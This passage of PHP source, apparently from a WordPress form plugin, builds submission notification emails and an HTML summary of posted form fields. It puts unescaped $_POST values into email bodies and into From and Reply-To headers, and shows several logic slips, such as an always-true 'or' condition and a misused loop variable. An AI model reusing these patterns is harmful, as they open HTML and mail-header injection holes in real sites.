						$new_value = str_replace('<br>',', ',$this->custom_fields_mail($type, $key, $id, '', ''));		
						if(substr($new_value, -2)==', ') {
							$new_value = substr($new_value, 0, -2);
						}
						$fromname = str_replace("%".$label_each."%", $new_value, $fromname);							
					}	
					
					if(strpos($subject, "%".$label_each."%")>-1) {	
						$new_value = str_replace('<br>',', ',$this->custom_fields_mail($type, $key, $id, '', ''));		
						if(substr($new_value, -2)==', ') {
							$new_value = substr($new_value, 0, -2);		
						}
						$subject = str_replace("%".$label_each."%", $new_value, $subject);							
					}
				}

				$recipient = '';
				$cca = $row->mail_cc_user;
				$bcc = $row->mail_bcc_user;
				if ($row->mail_from_user != '') {
					if ($fromname != '') {
						$from = "From: '" . $fromname . "' <" . $row->mail_from_user . ">" . "\r\n";
					}	
					else {
						$from = "From: '' <" . $row->mail_from_user . ">" . "\r\n";
					}
				}
				else {
					$from = '';
				}
					
				$headers =  $from . " Content-Type: " . $content_type . "; charset=\"" . get_option('blog_charset') . "\"\n";
				if ($replyto) {
					$headers .= "Reply-To: <" . $replyto . ">\r\n";
				}
				if ($cca) {
					$headers .= "Cc: <" . $cca . ">\r\n";          
				}
				if ($bcc) {
					$headers .= "Bcc: <" . $bcc . ">\r\n";          
				}

				$custom_fields_value = array( $ip, $useremail, $username, $subid, $list_user );	
				foreach($custom_fields as $key=>$custom_field)
				{
					if(strpos($new_script, "%".$custom_field."%")>-1)
					$new_script = str_replace("%".$custom_field."%", $custom_fields_value[$key], $new_script);

					if($key==2 || $key==3)
					{
						if(strpos($fromname, "%".$custom_field."%")>-1)
							$fromname = str_replace("%".$custom_field."%", $custom_fields_value[$key], $fromname);
							
						if(strpos($subject, "%".$custom_field."%")>-1)
							$subject = str_replace("%".$custom_field."%", $custom_fields_value[$key], $subject);
					}
				}
				$body = $new_script;
				$GLOBALS['attachment_user'] = array();
				$GLOBALS['attachment'] = array();
				if (defined('WD_FM_PDF') && is_plugin_active(constant('WD_FM_PDF'))) {
					$_GET['addon_task'] = 'frontend';
					$_GET['form_id'] = $id;
					$_GET['form_currency'] = $form_currency;
					$GLOBALS['custom_fields_value'] = $custom_fields_value;
					do_action('WD_FM_PDF_init');
				}
				if(!empty($GLOBALS['attachment_user']))
					array_push($attachment_user, $GLOBALS['attachment_user']);
				
				if($row->send_to) {
					$send_tos = explode('**',$row->send_to);
					$send_copy = isset($_POST["wdform_send_copy_".$id]) ? $_POST["wdform_send_copy_".$id] : NULL;
					if(isset($send_copy)) {
						$send=true;
					}
					else {
						$mail_verification_post_id = (int)$wpdb->get_var($wpdb->prepare('SELECT mail_verification_post_id FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $id));
						$verification_link = get_post( $mail_verification_post_id );
						foreach($send_tos as $index => $send_to) {
							$recipient = isset($_POST['wdform_'.str_replace('*', '', $send_to)."_element".$id]) ? $_POST['wdform_'.str_replace('*', '', $send_to)."_element".$id] : NULL;
							if(strpos($new_script, "%Verification link%")>-1 && $verification_link !== NULL) {
								$ver_link = $row->mail_mode_user ? "<a href =".add_query_arg(array('gid' => $_SESSION['gid'], 'h' => $_SESSION['hash'][$index].'@'.str_replace("*", "", $send_to)), get_post_permalink($mail_verification_post_id)).">".add_query_arg(array('gid' => $_SESSION['gid'], 'h' => $_SESSION['hash'][$index].'@'.str_replace("*", "", $send_to)), get_post_permalink($mail_verification_post_id))."</a><br/>" : add_query_arg(array('gid' => $_SESSION['gid'], 'h' => $_SESSION['hash'][$index].'@'.str_replace("*", "", $send_to)), get_post_permalink($mail_verification_post_id));
								
								$body = $row->mail_verify ? str_replace("%Verification link%", $ver_link, $new_script) : str_replace("%Verification link%", '', $new_script);
							}
							
							if($recipient) {
								$send = wp_mail(str_replace(' ', '', $recipient), $subject, stripslashes($body), $headers, $attachment_user);
							}
						}
					}
				}
			}
			
			if($row->sendemail) {
				if($row->reply_to) {
					$replyto = isset($_POST['wdform_'.$row->reply_to."_element".$id]) ? $_POST['wdform_'.$row->reply_to."_element".$id] : NULL;
					if(!isset($replyto)) {
						$replyto = $row->reply_to;
					}
				}
				$recipient = $row->mail;
				if($row->mail_subject) {
					$subject 	= $row->mail_subject;
				}
				else {
					$subject 	= $row->title;
				}
		
				if ($row->from_name) {
					$fromname = $row->from_name;
				}
				else {
					$fromname = '';
				}
				$attachment = array(); 
				if ($row->mail_attachment) {
					for ($k = 0; $k < count($all_files); $k++) {
						if (isset($all_files[$k]['tmp_name'])) {
						$attachment[$k] = $all_files[$k]['tmp_name'];
						}
					}
				}
				if(!empty($GLOBALS['attachment']))
					array_push($attachment, $GLOBALS['attachment']);	

					
				if ($row->mail_mode) {
					$content_type = "text/html";
					$mode = 1; 
					$list = wordwrap($list, 70, "\n", true);
					$new_script = wpautop($row->script_mail);
				}	
				else {
					$content_type = "text/plain";
					$mode = 0; 
					$list = $list_text_mode;
					$list = wordwrap($list, 1000, "\n", true);
					$new_script = str_replace(array('<p>','</p>'),'',$row->script_mail);
				}
					
				foreach($label_order_original as $key => $label_each) {							
					$type=$label_type[$key];
					if(strpos($row->script_mail, "%".$label_each."%")>-1) {
						$new_value = $this->custom_fields_mail($type, $key, $id, $attachment, '');				
						$new_script = str_replace("%".$label_each."%", $new_value, $new_script);							
					}
		
					if(strpos($fromname, "%".$label_each."%")>-1) {
						$new_value = str_replace('<br>',', ',$this->custom_fields_mail($type, $key, $id, '', ''));		
						if(substr($new_value, -2)==', ') {
							$new_value = substr($new_value, 0, -2);
						}
						$fromname = str_replace("%".$label_each."%", $new_value, $fromname);							
					}
					
					if(strpos($fromname, "%username%")>-1){
						$fromname = str_replace("%username%", $username, $fromname);
					}
		  
					if(strpos($subject, "%".$label_each."%")>-1) {
						$new_value = str_replace('<br>',', ',$this->custom_fields_mail($type, $key, $id, '', ''));		
						if(substr($new_value, -2)==', ') {
							$new_value = substr($new_value, 0, -2);				
						}
						$subject = str_replace("%".$label_each."%", $new_value, $subject);							
					}
				}
			
				if ($row->from_mail) {
					$from = isset($_POST['wdform_'.$row->from_mail."_element".$id]) ? $_POST['wdform_'.$row->from_mail."_element".$id] : NULL;
					if (!isset($from)) {
						$from = $row->from_mail;
					}
					$from = "From: '" . $fromname . "' <" . $from . ">" . "\r\n";
				}
				else {
					$from = "";
				}
					
				$headers =  $from . " Content-Type: " . $content_type . "; charset=\"" . get_option('blog_charset') . "\"\n";
				if ($replyto) {
					$headers .= "Reply-To: <" . $replyto . ">\r\n";
				}
				$cca = $row->mail_cc;
				$bcc = $row->mail_bcc;
				if ($cca) {
					$headers .= "Cc: <" . $cca . ">\r\n";          
				}
				if ($bcc) {
					$headers .= "Bcc: <" . $bcc . ">\r\n";          
				}
			
				$custom_fields_value = array( $ip, $useremail, $username, $subid, $list );	
				foreach($custom_fields as $key=>$custom_field)
				{
					if(strpos($new_script, "%".$custom_field."%")>-1)
					$new_script = str_replace("%".$custom_field."%", $custom_fields_value[$key], $new_script);

					if($key==2 || $key==3)
					{
						if(strpos($fromname, "%".$custom_field."%")>-1)
							$fromname = str_replace("%".$custom_field."%", $custom_fields_value[$key], $fromname);
							
						if(strpos($subject, "%".$custom_field."%")>-1)
							$subject = str_replace("%".$custom_field."%", $custom_fields_value[$key], $subject);
					}
				}
				$admin_body = $new_script;
				if($recipient) {
					$send = wp_mail(str_replace(' ', '', $recipient), $subject, stripslashes($admin_body), $headers, $attachment);
				}
			}
			
			$_SESSION['error_or_no' . $id] = 0;
			$msg = addslashes(__('Your form was successfully submitted.', 'form_maker'));
			$succes = 1;

			if($row->sendemail)
				if($row->mail || $row->send_to) {
					if ($send) {
						if ($send !== true ) {
							$_SESSION['error_or_no' . $id] = 1;
							$msg = addslashes(__('Error, email was not sent.', 'form_maker'));
							$succes = 0;
						}
						else {
							$_SESSION['error_or_no' . $id] = 0;
							$msg = addslashes(__('Your form was successfully submitted.', 'form_maker'));
						}
					}
				}
				
			$fm_email_params = $row->sendemail ? array('admin_body' => $admin_body, 'body' => $body, 'subject' => $subject, 'headers' => $headers, 'attachment' => $attachment, 'attachment_user' => $attachment_user) : array();
                       
			$addons = array('WD_FM_EMAIL_COND' => 'Email Conditions');
			$addons_array = array();
			foreach($addons as $addon => $addon_name) {	
				if (defined($addon) && is_plugin_active(constant($addon))) {
					$_GET['addon_task'] = 'frontend';
					$_GET['form_id'] = $id;
					$GLOBALS['fm_email_params'] = $fm_email_params;
					$GLOBALS['form_currency'] = $form_currency;
					$GLOBALS['custom_fields_value'] = isset($custom_fields_value) ? $custom_fields_value : array();
					do_action($addon.'_init');
				}				
			}	
		}
		else { /* Old form.*/
			foreach ($label_order_ids as $key => $label_order_id) {
				$i = $label_order_id;
				$type = $_POST[$i . "_type" . $id];
				if (isset($_POST[$i . "_type" . $id]))
					if ($type != "type_map" and  $type != "type_submit_reset" and  $type != "type_editor" and  $type != "type_captcha" and $type != "type_arithmetic_captcha" and  $type != "type_recaptcha" and  $type != "type_button") {
						$element_label = $label_order_original[$i];
						switch ($type) {
							case 'type_text':
							case 'type_password':
							case 'type_textarea':
							case "type_date":
							case "type_own_select":
							case "type_country":
							case "type_number":
							{
								$element = $_POST[$i . "_element" . $id];
								if (isset($_POST[$i . "_element" . $id])) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td ><pre style="margin:0px; padding:0px">' . $element . '</pre></td></tr>';
								}
								break;
							}
							case "type_hidden": {
								$element = $_POST[$element_label];
								if (isset($element)) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td ><pre style="margin:0px; padding:0px">' . $element . '</pre></td></tr>';
								}
								break;
							}
							case "type_submitter_mail":
							{
								$element = $_POST[$i . "_element" . $id];
								if (isset($_POST[$i . "_element" . $id])) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td ><pre style="margin:0px; padding:0px">' . $element . '</pre></td></tr>';
									if ($_POST[$i . "_send" . $id] == "yes")
										array_push($cc, $element);
								}
								break;
							}
							case "type_time":
							{
								$hh = $_POST[$i . "_hh" . $id];
								if (isset($_POST[$i . "_hh" . $id])) {
									$ss = $_POST[$i . "_ss" . $id];
									if (isset($_POST[$i . "_ss" . $id]))
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_hh" . $id] . ':' . $_POST[$i . "_mm" . $id] . ':' . $_POST[$i . "_ss" . $id];
									else
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_hh" . $id] . ':' . $_POST[$i . "_mm" . $id];
									$am_pm = $_POST[$i . "_am_pm" . $id];
									if (isset($_POST[$i . "_am_pm" . $id]))
										$list = $list . ' ' . $_POST[$i . "_am_pm" . $id] . '</td></tr>';
									else
										$list = $list . '</td></tr>';
								}
								break;
							}
							case "type_phone":
							{
								$element_first = $_POST[$i . "_element_first" . $id];
								if (isset($_POST[$i . "_element_first" . $id])) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_element_first" . $id] . ' ' . $_POST[$i . "_element_last" . $id] . '</td></tr>';
								}
								break;
							}
							case "type_name":
							{
								$element_first = $_POST[$i . "_element_first" . $id];
								if (isset($_POST[$i . "_element_first" . $id])) {
									$element_title = $_POST[$i . "_element_title" . $id];
									if (isset($_POST[$i . "_element_title" . $id]))
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_element_title" . $id] . ' ' . $_POST[$i . "_element_first" . $id] . ' ' . $_POST[$i . "_element_last" . $id] . ' ' . $_POST[$i . "_element_middle" . $id] . '</td></tr>';
									else
										$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_element_first" . $id] . ' ' . $_POST[$i . "_element_last" . $id] . '</td></tr>';
								}
								break;
							}
							case "type_mark_map":
							{
								if (isset($_POST[$i . "_long" . $id])) {
									$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >Longitude:' . $_POST[$i . "_long" . $id] . '<br/>Latitude:' . $_POST[$i . "_lat" . $id] . '</td></tr>';
								}
								break;
							}
							case "type_address":
							{
								if (isset($_POST[$i . "_street1" . $id]))
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $_POST[$i . "_street1" . $id] . '</td></tr>';
								$i++;
								if (isset($_POST[$i."_street2".$id]))
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $_POST[$i . "_street2" . $id] . '</td></tr>';
								$i++;
								if (isset($_POST[$i."_city".$id]))
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $_POST[$i . "_city" . $id] . '</td></tr>';
								$i++;
								if (isset($_POST[$i."_state".$id]))
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $_POST[$i . "_state" . $id] . '</td></tr>';
								$i++;
								if (isset($_POST[$i."_postal".$id]))
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $_POST[$i . "_postal" . $id] . '</td></tr>';
								$i++;
								if (isset($_POST[$i."_country".$id]))
									$list = $list . '<tr valign="top"><td >' . $label_order_original[$i] . '</td><td >' . $_POST[$i . "_country" . $id] . '</td></tr>';
								$i++;
							break;
						}
						case "type_date_fields":
						{
							$day = $_POST[$i . "_day" . $id];
							if (isset($_POST[$i . "_day" . $id])) {
								$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_day" . $id] . '-' . $_POST[$i . "_month" . $id] . '-' . $_POST[$i . "_year" . $id] . '</td></tr>';
							}
							break;
						}
						case "type_radio":
						{
							$element = $_POST[$i . "_other_input" . $id];
							if (isset($_POST[$i . "_other_input" . $id])) {
								$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >' . $_POST[$i . "_other_input" . $id] . '</td></tr>';
								break;
							}
							$element = $_POST[$i . "_element" . $id];
							if (isset($_POST[$i . "_element" . $id])) {
								$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td ><pre style="margin:0px; padding:0px">' . $element . '</pre></td></tr>';
							}
							break;
						}
						case "type_checkbox":
						{
							$list = $list . '<tr valign="top"><td >' . $element_label . '</td><td >';
							$start = -1;
							for ($j = 0; $j < 100; $j++) {
								if (isset($_POST[$i . "_element" . $id . $j])) {
									$start = $j;
									break;
								}
							}
							$other_element_id = -1;
							$is_other = $_POST[$i . "_allow_other" . $id];
							if ($is_other == "yes") {
								$other_element_id = $_POST[$i . "_allow_other_num" . $id];
							}
							if ($start != -1) {
								for ($j = $start; $j < 100; $j++) {
									$element = $_POST[$i . "_element" . $id . $j];
									if (isset($_POST[$i . "_element" . $id . $j]))
										if ($j == $other_element_id) {
											$list = $list . $_POST[$i . "_other_input" . $id] . '<br>';
										}
										else
											$list = $list . $_POST[$i . "_element" . $id . $j] . '<br>';
								}
								$list = $list . '</td></tr>';
							}
							break;
						}
						case "type_paypal_price":	 {		
							$value = 0;
							if ($_POST[$i."_element_dollars".$id]) {
								$value = $_POST[$i."_element_dollars".$id];
							}
							if ($_POST[$i."_element_cents".$id]) {
								$value = $value.'.'.$_POST[$i."_element_cents".$id];
							}
							$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td >'.$value.$form_currency.'</td></tr>';
							break;
						}
						case "type_paypal_select": {
							$value = $_POST[$i."_element_label".$id].':'.$_POST[$i."_element".$id].$form_currency;
							$element_quantity_label = $_POST[$i."_element_quantity_label".$id];
							if (isset($element_quantity_label)) {
								$quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
								$value .= '<br/>'.$_POST[$i."_element_quantity_label".$id].': '.$quantity;
							}
							for ($k = 0; $k < 50; $k++) {
								$temp_val = $_POST[$i."_element_property_value".$id.$k];
								if (isset($temp_val)) {			
									$value .= '<br/>'.$_POST[$i."_element_property_label".$id.$k].': '.$_POST[$i."_element_property_value".$id.$k];
								}
							}
							$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$value.'</pre></td></tr>';					
							break;
						}
						case "type_paypal_radio": {
							$value = $_POST[$i."_element_label".$id].' - '.$_POST[$i."_element".$id].$form_currency;
							$element_quantity_label = $_POST[$i."_element_quantity_label".$id];
							if (isset($element_quantity_label)) {
								$quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . 	"_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
								$value .= '<br/>' . $_POST[$i."_element_quantity_label".$id] . ': ' . $quantity;
							}
							for ($k = 0; $k < 50; $k++) {
								$temp_val = $_POST[$i."_element_property_value".$id.$k];
								if (isset($temp_val)) {			
									$value .= '<br/>'.$_POST[$i."_element_property_label".$id.$k].': '.$_POST[$i."_element_property_value".$id.$k];
								}
							}
							$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$value.'</pre></td></tr>';				
							break;	
						}
						case "type_paypal_shipping": {
							$value = $_POST[$i."_element_label".$id].' - '.$_POST[$i."_element".$id].$form_currency;		
							$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$value.'</pre></td></tr>';				
							break;
						}
						case "type_paypal_checkbox": {
							$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td >';
							$start = -1;
							for ($j = 0; $j < 100; $j++) {
								$element = $_POST[$i."_element".$id.$j];
								if (isset($element)) {
									$start = $j;
									break;
								}
							}
							if ($start != -1) {
								for ($j = $start; $j < 100; $j++) {
									$element = $_POST[$i."_element".$id.$j];
									if (isset($element)) {
										$list = $list.$_POST[$i."_element".$id.$j."_label"].' - '.($_POST[$i."_element".$id.$j]=='' ? '0'.$form_currency : $_POST[$i."_element".$id.$j]).$form_currency.'<br>';
									}
								}
							}
							$element_quantity_label = $_POST[$i."_element_quantity_label".$id];
							if (isset($element_quantity_label)) {
								$quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
								$list = $list.'<br/>'.$_POST[$i."_element_quantity_label".$id].': '.$quantity;
							}
							for ($k = 0; $k < 50; $k++) {
								$temp_val = $_POST[$i."_element_property_value".$id.$k];
								if (isset($temp_val)) {			
									$list = $list.'<br/>'.$_POST[$i."_element_property_label".$id.$k].': '.$_POST[$i."_element_property_value".$id.$k];
								}
							}
							$list = $list.'</td></tr>';
							break;
						}
						case "type_star_rating": {
							$selected = (isset($_POST[$i."_selected_star_amount".$id]) ? $_POST[$i."_selected_star_amount".$id] : 0);
							if (isset($_POST[$i."_star_amount".$id])) {
								$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$selected.'/'.$_POST[$i."_star_amount".$id].'</pre></td></tr>';
							}
							break;
						}
						case "type_scale_rating": {
							$selected = (isset($_POST[$i."_scale_radio".$id]) ? $_POST[$i."_scale_radio".$id] : 0);
							if (isset($_POST[$i."_scale_amount".$id])) {
								$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$selected.'/'.$_POST[$i."_scale_radio".$id].'</pre></td></tr>';
							}
							break;
						}
						case "type_spinner": {
							if (isset($_POST[$i."_element".$id])) {
								$list=$list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$_POST[$i."_element".$id].'</pre></td></tr>';					
							}
							break;
						}
						case "type_slider": {
							if (isset($_POST[$i."_slider_value".$id])) {
								$list=$list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$_POST[$i."_slider_value".$id].'</pre></td></tr>';					
							}
							break;
						}
						case "type_range": {
							if(isset($_POST[$i."_element".$id.'0']) || isset($_POST[$i."_element".$id.'1'])) {
								$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">From:'.$_POST[$i."_element".$id.'0'].'<span style="margin-left:6px">To</span>:'.$_POST[$i."_element".$id.'1'].'</pre></td></tr>';
							}
							break;
						}
						case "type_grading": {
							if (isset($_POST[$i."_hidden_item".$id])) {
								$element = $_POST[$i."_hidden_item".$id];
								$grading = explode(":", $element);
								$items_count = sizeof($grading) - 1;
								$total = "";
								for ($k = 0; $k < $items_count; $k++) {
									if (isset($_POST[$i."_element".$id.$k])) {
										$element .= $grading[$k].":".$_POST[$i."_element".$id.$k]." ";
										$total += $_POST[$i."_element".$id.$k];
									}
								}
								$element .= "Total:".$total;
								$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$element.'</pre></td></tr>';
							}
							break;
						}
						case "type_matrix": {
							$input_type=$_POST[$i."_input_type".$id]; 
							$mat_rows = $_POST[$i."_hidden_row".$id];
							$mat_rows = explode('***', $mat_rows);
							$mat_rows = array_slice($mat_rows,0, count($mat_rows)-1);
							$mat_columns = $_POST[$i."_hidden_column".$id];
							$mat_columns = explode('***', $mat_columns);
							$mat_columns = array_slice($mat_columns,0, count($mat_columns)-1);
							$row_ids=explode(",",substr($_POST[$i."_row_ids".$id], 0, -1));
							$column_ids=explode(",",substr($_POST[$i."_column_ids".$id], 0, -1));
							$matrix = "<table>";
							$matrix .= '<tr><td></td>';
							for ($k = 0; $k < count($mat_columns); $k++) {
								$matrix .='<td style="background-color:#BBBBBB; padding:5px; ">'.$mat_columns[$k].'</td>';
							}
							$matrix .= '</tr>';
							$aaa = Array();
							$k = 0;
							foreach ($row_ids as $row_id) {
								$matrix .= '<tr><td style="background-color:#BBBBBB; padding:5px;">'.$mat_rows[$k].'</td>';
								if ($input_type=="radio") {
									$mat_radio = (isset($_POST[$i."_input_element".$id.$row_id]) ? $_POST[$i."_input_element".$id.$row_id] : 0);											
									if ($mat_radio == 0) {
										$checked = "";
										$aaa[1] = "";
									}
									else {
										$aaa = explode("_", $mat_radio);
									}
									foreach ($column_ids as $column_id) {
										if ($aaa[1] == $column_id) {
											$checked = "checked";
										}
										else {
											$checked = "";
										}
										$matrix .= '<td style="text-align:center"><input  type="radio" '.$checked.' disabled /></td>';
									}
								}
								else {
									if ($input_type=="checkbox") {
										foreach($column_ids as $column_id) {
											$checked = $_POST[$i."_input_element".$id.$row_id.'_'.$column_id];                     
											if ($checked == 1) {			
												$checked = "checked";
											}
											else {		
												$checked = "";
											}
											$matrix .= '<td style="text-align:center"><input  type="checkbox" '.$checked.' disabled /></td>';
										} 
									}
									else {
										if ($input_type=="text") {
											foreach ($column_ids as $column_id) {
												$checked = $_POST[$i."_input_element".$id.$row_id.'_'.$column_id];
												$matrix .='<td style="text-align:center"><input  type="text" value="'.$checked.'" disabled /></td>';
											}
										}
										else {
											foreach ($column_ids as $column_id) {
												$checked = $_POST[$i."_select_yes_no".$id.$row_id.'_'.$column_id];
												$matrix .='<td style="text-align:center">'.$checked.'</td>';
											}
										}
									}
								}
								$matrix .= '</tr>';
								$k++;
							}
							$matrix .= '</table>';
							if (isset($matrix)) {
								$list = $list.'<tr valign="top"><td >'.$element_label.'</td><td ><pre style="margin:0px; padding:0px">'.$matrix.'</pre></td></tr>';
							}
							break;
						}
						default:
						break;
					}
				}
			}
			$list = $list . '</table>';
			$list = wordwrap($list, 70, "\n", TRUE);
			// add_filter('wp_mail_content_type', create_function('', 'return "text/html";'));
			if ($row->from_mail != '') {
				if ($row->from_name != '') {
					$from_mail = "From: '" . $row->from_name . "' <" . $row->from_mail . ">" . "\r\n";
				}
				else {
					$from_mail = "From: '' <" . $row->from_mail . ">" . "\r\n";
				}
			}
			else {
				$from_mail = '';
			}
			$headers = $from_mail . " Content-Type: text/html; charset=\"" . get_option('blog_charset') . "\"\n";
			for ($k = 0; $k < count($all_files); $k++) {
				// $attachment[$k] = dirname(__FILE__) . '/uploads/' . $all_files[$k]['name'];
				$attachment[$k]= $all_files[$k]['name'];
			}
			if (isset($cc[0])) {
				foreach ($cc as $c) {
					if ($c) {
						$recipient = $c;
						$subject = $row->title;
						$new_script = wpautop($row->script_mail_user);
						foreach ($label_order_original as $key => $label_each) {
							if (strpos($row->script_mail_user, "%" . $label_each . "%") !== FALSE) {
								$type = $label_type[$key];
								if ($type != "type_submit_reset" or $type != "type_map" or $type != "type_editor" or  $type != "type_captcha" or $type != "type_arithmetic_captcha" or  $type != "type_recaptcha" or  $type != "type_button") {
									$new_value = "";
								switch ($type) {
									case 'type_text':
									case 'type_password':
									case 'type_textarea':
									case "type_date":
									case "type_own_select":					
									case "type_country":				
									case "type_number":	 {
										$element = $_POST[$key."_element".$id];
										if (isset($element)) {
											$new_value = $element;					
										}
										break;
									}
						case "type_hidden": {
						  $element = $_POST[$element_label];
						  if (isset($element)) {
							$new_value = $element;	
						  }
						  break;
						}                
						case "type_mark_map": {
						  $element = $_POST[$key."_long".$id];
						  if (isset($element)) {
							$new_value = 'Longitude:'.$_POST[$key."_long".$id].'<br/>Latitude:' . $_POST[$key."_lat".$id];
						  }
						  break;
						}
						case "type_submitter_mail": {
						  $element = $_POST[$key."_element".$id];
						  if (isset($element)) {
							$new_value = $element;					
						  }
						  break;
						}
						case "type_time": {
						  $hh = $_POST[$key."_hh".$id];
						  if (isset($hh)) {
							$ss = $_POST[$key."_ss".$id];
							if (isset($ss)) {
							  $new_value = $_POST[$key."_hh".$id].':'.$_POST[$key."_mm".$id].':'.$_POST[$key."_ss".$id];
							}
							else {
							  $new_value = $_POST[$key."_hh".$id].':'.$_POST[$key."_mm".$id];
							}
							$am_pm = $_POST[$key."_am_pm".$id];
							if (isset($am_pm)) {
							  $new_value = $new_value.' '.$_POST[$key."_am_pm".$id];
							}
						  }
						  break;
						}
						case "type_phone": {
						  $element_first = $_POST[$key."_element_first".$id];
						  if (isset($element_first)) {
							$new_value = $_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id];
						  }	
						  break;
						}
						case "type_name": {
						  $element_first = $_POST[$key."_element_first".$id];
						  if (isset($element_first)) {
							$element_title = $_POST[$key."_element_title".$id];
							if (isset($element_title)) {
							  $new_value = $_POST[$key."_element_title".$id].' '.$_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id].' '.$_POST[$key."_element_middle".$id];
							}
							else {
							  $new_value = $_POST[$key."_element_first".$id].' '.$_POST[$key."_element_last".$id];
							}
						  }	   
						  break;		
						}
						case "type_address": {
						  if (isset($_POST[$key."_street1".$id])) {
							$new_value = $new_value.$_POST[$key."_street1".$id];
							break;
						  }
						  if (isset($_POST[$key."_street2".$id])) {
							$new_value = $new_value.$_POST[$key."_street2".$id];
							break;
						  }
						  if (isset($_POST[$key."_city".$id])) {
							$new_value = $new_value.$_POST[$key."_city".$id];
							break;
						  }
						  if (isset($_POST[$key."_state".$id])) {
							$new_value = $new_value.$_POST[$key."_state".$id];
							break;
						  }
						  if (isset($_POST[$key."_postal".$id])) {
							$new_value = $new_value.$_POST[$key."_postal".$id];
							break;
						  }
						  if (isset($_POST[$key."_country".$id])) {
							$new_value = $new_value.$_POST[$key."_country".$id];
							break;
						  }
						}
						case "type_date_fields": {
						  $day = $_POST[$key."_day".$id];
						  if (isset($day)) {
							$new_value = $_POST[$key."_day".$id].'-'.$_POST[$key."_month".$id].'-'.$_POST[$key."_year".$id];
						  }
						  break;
						}
						case "type_radio": {
						  $element = $_POST[$key."_other_input".$id];
						  if (isset($element)) {
							$new_value = $_POST[$key."_other_input".$id];
							break;
						  }
						  $element = $_POST[$key."_element".$id];
						  if (isset($element)) {
							$new_value = $element;					
						  }
						  break;	
						}
						case "type_checkbox": {
						  $start = -1;
						  for ($j = 0; $j < 100; $j++) {
							$element = $_POST[$key."_element".$id.$j];
							if (isset($element)) {
							  $start = $j;
							  break;
							}
						  }
						  $other_element_id = -1;
						  $is_other = $_POST[$key."_allow_other".$id];
						  if ($is_other == "yes") {
							$other_element_id = $_POST[$key."_allow_other_num".$id];
						  }
						  if ($start != -1) {
							for ($j = $start; $j < 100; $j++) {
							  $element = $_POST[$key."_element".$id.$j];
							  if (isset($element)) {
								if ($j == $other_element_id) {
								  $new_value = $new_value.$_POST[$key."_other_input".$id].'<br>';
								}
								else {
								  $new_value = $new_value.$_POST[$key."_element".$id.$j].'<br>';
								}
							  }
							}
						  }
						  break;
						}
						case "type_paypal_price":	{		
						  $new_value = 0;
						  if ($_POST[$key."_element_dollars".$id]) {
							$new_value = $_POST[$key."_element_dollars".$id];
						  }
						  if ($_POST[$key."_element_cents".$id]) {
							$new_value = $new_value.'.'.$_POST[$key."_element_cents".$id];
						  }
						  $new_value = $new_value.$form_currency;
						  break;
						}
						case "type_paypal_select": {	
						  $new_value = $_POST[$key."_element_label".$id].':'.$_POST[$key."_element".$id].$form_currency;
						  $element_quantity_label = $_POST[$key."_element_quantity_label".$id];
						  if (isset($element_quantity_label)) {
							$quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
							$new_value.='<br/>'.$_POST[$key."_element_quantity_label".$id].': '.$quantity;
						  }
						  for ($k = 0; $k < 50; $k++) {
							$temp_val = $_POST[$key."_element_property_value".$id.$k];
							if (isset($temp_val)) {			
							  $new_value .= '<br/>'.$_POST[$key."_element_property_label".$id.$k].': '.$_POST[$i."_element_property_value".$id.$k];
							}
						  }
						  break;
						}
						case "type_paypal_radio": {
						  $new_value = $_POST[$key."_element_label".$id].' - '.$_POST[$key."_element".$id].$form_currency;
						  $element_quantity_label = $_POST[$key."_element_quantity_label".$id];
						  if (isset($element_quantity_label)) {
							$quantity = ((isset($_POST[$key . "_element_quantity" . $id]) && ($_POST[$key . "_element_quantity" . $id] >= 1)) ? $_POST[$key . "_element_quantity" . $id] : 1);
